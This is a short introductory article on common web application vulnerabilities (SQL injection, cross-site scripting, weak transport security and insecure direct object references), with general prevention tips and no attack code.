Hack app: top vulnerabilities in web apps

Dec 28
19:50

2020

Ivanka Kartata

Ivanka Kartata

  • Share this article on Facebook
  • Share this article on Twitter
  • Share this article on Linkedin

Cyber hackers can easily get into the database and steal client's personal information. With security strategy and knowledge of the most vulnerable spots in a system, you can prevent and avoid data breaches.

mediaimage

A web app is a great tool for interactions between clients and a company product. But because web apps store and process a lot of sensitive and private clients' information,Hack app: top vulnerabilities in web apps Articles they frequently occur under scammers' spotlight. 

Open Web Security Project community with a primary goal to increase web app security, created a document with recommendations to minimize risks.

According to the OWSP, there are the main vulnerabilities in web apps that can be loopholes for cybercriminals.

SQL injection

SQL is a query language that can be used for access, changing, and deleting data in databases. According to Edgescan 2020 Vulnerability Stats Report, 42% of web app vulnerabilities were caused by SQL injections. It is one of the most popular cyberattacks as it is easy enough to perform. The main danger is that a large part of the web is built on SQL.

SQL injection is a technique that allows hackers to get access to the database by injecting malicious SQL statements due to vulnerabilities in it. Scammers can use SQL commands in input fields (login, password, email)  to get access to a user's or administrator's account and manipulate a system. They can transfer money from a client's account to their own, steal private data, and change or delete it. Overall, such an attack gives access to all data in a database server.

Fortunately, there are many techniques to prevent SQL injections and minimize risks.

  • ban irrelevant characters in fields to prevent input SQL commands;
  • use a web application firewall to identify and block malicious web requests;
  • turn off unnecessary database functions because they can be a potential loophole for scammers.
Cross-site scripting (XSS)

Such sites as MySpace, Facebook, Barack Obama’s electoral campaignwebsite, eBay, and even the FBI underwent XSS cyberattack. 

Cross-site scripting is a vulnerability in dynamic web pages and web apps. An attacker can implement malicious scripts on a web page to get access to a user's web browser. Thus, to become attackers' victim enough to visit a page with malicious scripts. Also, scammers can change and manage all content of the website. For example, they can redirect users to other malicious sites. Attackers can get access to user's web browser cookies.  With cookies, they can make manipulative actions, impersonate to steal private data.  

JavaScript is the main language for XSS attacks, but also possible with VBScript, ActiveX, Flash, and even CSS. XSS attacks can be possible if a web app includes user input as in it a string can be implemented and interpreted as code.

Prevention activity:

  • filter input data to ensure that users input only proper information and content encode output data to ensure that untrusted data don't interpret as active content;
  • encode syntax for the part of the HTML document you're putting untrusted data into.
  • deny data that came from the client into your HTML as it can be used for malicious activity.
  • all data from users can be interpreted as untrusted so, it's better to validate and encode it for the correct output.

 

Insufficient Transport Layer Protection

This vulnerability is caused by a lack of security measures or expired security certificates. 

Web apps use exchanging data between user and server. When user input data, app refer to a server to authenticate information and app use security protocols( SSL/TLS) to protect data. But in some parts of a web app, an app doesn't use it properly or use expired security certificates, and data occurs exposed. 

It can lead to a data breach, and attackers can intercept private information. 

 

Insecure direct object references (IDOR)

Insecure direct object references (IDOR) is a failure of access control implementation when a web app allows getting access to objects through inputting data by users. Attackers can modify parameters in URL, for example, value ID that refers to a user account. If a web app has IDOR vulnerability, attackers will get access to another account without authorization. Dangerous is that number 1 is an admin account. 

A solution for this vulnerability is strict testing access control and not setting up additional control, verify authorization to all reference objects.